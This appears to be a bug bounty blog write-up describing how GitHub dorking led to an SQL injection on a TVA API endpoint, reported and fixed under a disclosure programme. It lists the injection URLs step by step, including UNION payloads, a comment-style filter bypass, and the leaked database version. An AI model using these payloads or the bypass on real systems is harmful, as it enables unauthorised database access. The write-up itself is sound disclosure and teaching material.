I found an SQL injection using Github dorking and here's my short story.BugBounty 2022. 4. 28. 08:23
Never forget about Github dorking.
Last year, I was invited by TVA VDP via Hackerone . After reviewing their scope, I started my recon flow.
I always start with github dorking because most of the time it contains low hanging fruits and sometimes hidden subdomains.
After a few minutes, I discovered an interesting endpoint within a hidden subdomain. When I say hidden, I mean a subdomain that can't be found via ordinary tools.
When gathering subdomains, never depend on automatic tools only.
Tip: use bing.com search engine also, it's helpful because sometimes it gives you hidden endpoints too.
The moment I saw the endpoint, I thought of SQL injection. How? Well because it looks like the code GVDA1 is being checked in the database.
I added a single quote and the page responded with an MSSQL database error message
https://soa.tva.gov/api/river/observed-data/PICT1' -> MSSQL database error message
https://soa.tva.gov/api/river/observed-data/PICT1'-- - -> No Error
https://soa.tva.gov/api/river/observed-data/PICT1' ORDER BY 2 -- - -> Database Error
https://soa.tva.gov/api/river/observed-data/PICT1' ORDER BY 1-- - -> No Error
https://soa.tva.gov/api/river/observed-data/PICT1' UNION SELECT db_name()-- - -> 400 CODE Error
I injected some Union payloads and it turned out that there was something blocking them all. After trying a few more payloads, I managed to craft a bypass which looks like this /*!50000Union*/
Responded With Database Name
Responded With MSSQL Version
Microsoft SQL Server 2017 (RTM-CU22-GDR) (KB4583457) - 14.0.3370.1 (X64) \n\tNov 6 2020 18:19:52 \n\tCopyright (C) 2017 Microsoft Corporation\n\tEnterprise Edition (64- bit) on Windows Server 2012 R2 Standard 6.3 < X64 > (Build 9600: ) (Hypervisor)\n
Reported on Mar 15th 2021
Resolved on Mar 31st 2021
Agreed to disclose Apr 26th 2022
It's a small writeup but I want to teach you two things:
- Always do github dorking the in early stages of your recon.
- There are plenty of bypasses out there, try to use them all .
Last but not least, here are some useful resources to learn about SQL injection:
See you soon.
'BugBounty' 카테고리의 다른 글
From Unexploited XSS To Self Stored XSS on victim Cookies (0) 2021.03.22 Cors Misconfiguration : Steal victim token and PII leads to ATO (0) 2021.03.22